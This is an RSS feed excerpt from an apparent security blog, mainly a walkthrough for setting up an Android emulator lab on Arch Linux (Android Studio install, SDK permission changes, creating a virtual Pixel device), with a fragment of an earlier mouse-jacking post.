reviewing tools and ordering other things I may require for successful building of the project.</p> <p>More to come!</p> Sat, 01 Jun 2019 12:00:00 +0000 https://www.marginaldeer.com//blog/keykeriki-mouse-jacking/ https://www.marginaldeer.com//blog/keykeriki-mouse-jacking/ hardware pentest blog Android Pentest Lab Build <p>This post will discuss the steps necessary to setup an Android lab environment where APKs can be loaded and played with.</p> <p>The first step is to install <a href="https://developer.android.com/studio/">Android Studio</a>. I am using Arch Linux as my base OS for this lab. With the right know how these installation steps can be adapted to any OS you’d like.</p> <p>Make sure you have an AUR package manager such as ‘yay’ installed if you’re building this on Arch!</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>yay -S android-studio android-emulator </code></pre></div></div> <p><img src="/images/posts/2018/android-studio-install.png" alt="Screenshot" /></p> <p>These installation packages are large and may take some time to complete the installation process on your system.</p> <p>We will test that our PATH variable is setup correctly by running:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>adb --help </code></pre></div></div> <p>You should see something like this:</p> <p><img src="/images/posts/2018/adb-help.jpg" alt="Screenshot" /></p> <p>Since yay installs Android Studio as root into <code class="language-plaintext highlighter-rouge">/opt/android-sdk/</code> we need to modify some permissions on the directory. We create a new group <code class="language-plaintext highlighter-rouge">sdkusers</code> and assign our non-root user as a member then change the group that owns the files to the group. Obviously, change the username from <code class="language-plaintext highlighter-rouge">marg</code> to your username. The last command will make our current terminal session aware of the new group.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>groupadd sdkusers gpasswd -a marg sdkusers chown -R :sdkusers /opt/android-sdk/ chmod -R g+w /opt/android-sdk/ newgrp sdkusers </code></pre></div></div> <p>Let’s now launch Anrdoid Studio as our non-root user and run through the initial configuration.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>android-studio </code></pre></div></div> <p>Below are the options I selected for my initial configuration. Feel free to modify however you prefer.</p> <p><img src="/images/posts/2018/android-import-settings.jpg" alt="Screenshot" /> <img src="/images/posts/2018/android-install-type.jpg" alt="Screenshot" /> <img src="/images/posts/2018/android-ui-theme.jpg" alt="Screenshot" /> <img src="/images/posts/2018/android-verify-settings.jpg" alt="Screenshot" /></p> <p>Setup will download and update all the necessary componenets which may take some time to complete. Once it completes you can finally click finish. If all goes well you should be presented with this screen:</p> <p><img src="/images/posts/2018/android-project-select.jpg" alt="Screenshot" /></p> <p>Go ahead and create a project selecting whatever options you’d like. It doesn’t really matter what we choose because we just want to get to the Android Virtual Device Manager.</p> <p>Once your project is loaded up into the IDE environment, click the AVD Manager icon located in the upper right corner.</p> <p><img src="/images/posts/2018/avd-manager.jpg" alt="Screenshot" /></p> <p>Click <code class="language-plaintext highlighter-rouge">Create Virtual Device...</code></p> <p>This is where the fun begins and you can make selections on the deivce you want to emulate. For my situation I selected <code class="language-plaintext highlighter-rouge">Pixel</code>.</p> <p><img src="/images/posts/2018/avd-pixel-selection.jpg" alt="Screenshot" /></p> <p>Next, we need to select an image that we will download and run on the emulated phone. For my purposes I selected a <code class="language-plaintext highlighter-rouge">7.1.1</code> build and clicked Download to the right of the release name.</p> <p><img src="/images/posts/2018/avd-image-selection.jpg" alt="Screenshot" /></p> <p>I accepted all the default options in the Download diaglog that appeared. This step may take some time since we’re downloading a large system image. Click finish and you should be presented with the same screen as before. Click Next to continue.</p> <p>On the last screen of the new device wizard I made no changes, but I incourage you to mess around with the options available to you. Finally, select Finish.</p> <p><img src="/images/posts/2018/avd-final-device-add.jpg" alt="Screenshot" /></p> <p>With the setup and installation of the emulated device complete let’s go ahead and give it a test run. In the AVD Manager click the play button in the actions column.</p> <p><img src="/images/posts/2018/avd-launch-emulation.jpg" alt="Screenshot" /></p> <p>If everything has gone successfully, you will be presented with an emulation of an android device!</p> <p><img src="/images/posts/2018/avd-emulation-device-on.jpg" alt="Screenshot" /></p> <p>I will be following up this walkthrough with more articles on how we can take advantage of this emulated device.</p> Wed, 21 Nov 2018 18:42:00 +0000 https://www.marginaldeer.com//blog/android-pentest-lab/ https://www.marginaldeer.com//blog/android-pentest-lab/ android linux lab pentest blog